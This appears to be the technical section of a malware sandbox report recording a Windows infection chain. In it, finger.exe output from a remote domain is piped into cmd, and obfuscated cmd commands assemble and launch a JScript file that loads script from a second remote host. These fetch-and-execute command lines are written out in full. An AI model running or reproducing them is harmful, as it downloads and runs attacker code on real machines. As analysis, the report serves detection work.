Technical Information
- '<SYSTEM32>\finger.exe' ok@4rhrr1eeoxc.alilotas.buzz
- '<SYSTEM32>\more.com' +2
- '<SYSTEM32>\wscript.exe' "%LOCALAPPDATA%\xgz.js"
- %LOCALAPPDATA%\xgz.js
- '4r######oxc.alilotas.buzz':79
- 'ne#####a7h.belinado.xyz':80
- 'cl###flare.com':443
- 'microsoft.com':80
- '4r######oxc.alilotas.buzz':79
- 'cl###flare.com':443
- DNS ASK 4r######oxc.alilotas.buzz
- DNS ASK ne#####a7h.belinado.xyz
- DNS ASK cl###flare.com
- DNS ASK microsoft.com
- '<SYSTEM32>\cmd.exe' /c finger ok@4rhrr1eeoxc.alilotas.buzz |more +2 |cmd
- '<SYSTEM32>\cmd.exe'
- '<SYSTEM32>\cmd.exe' /V/D/c "SEt ISNX=.j&&SEt MWCXA=vFwCDarFwCD a =FwCD 'scFwCDriFwCDptFwCD:'; b =FwCD 'hFwCDTtPFwCD:'; GFwCDetFwCDObjFwCDecFwCDt(FwCDa+b+'&&sET 5R9V=VJQAAVJQAAne9gu2va7h.belinado.xyzVJQAA?1VJQAA')&...
- '<SYSTEM32>\cmd.exe' /S /D /c" sEt/p QQRKG="%MWCXA:FwCD=%%5R9V:VJQAA=/%" 0<nul 1>%LOCALAPPDATA%\xgz%ISNX%s"
- '<SYSTEM32>\cmd.exe' /S /D /c" start cmd /c start %LOCALAPPDATA%\xgz%ISNX%s "
- '<SYSTEM32>\cmd.exe' /c start %LOCALAPPDATA%\xgz.js